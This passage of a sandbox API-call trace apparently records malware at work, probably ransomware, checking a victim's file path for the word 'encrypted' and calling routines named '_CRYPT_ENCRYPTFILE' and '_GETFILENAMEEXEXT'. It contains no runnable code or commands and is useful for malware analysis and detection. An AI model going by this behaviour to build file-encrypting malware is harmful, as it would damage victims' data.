HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ms2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.413] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.413] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.413] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.413] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, 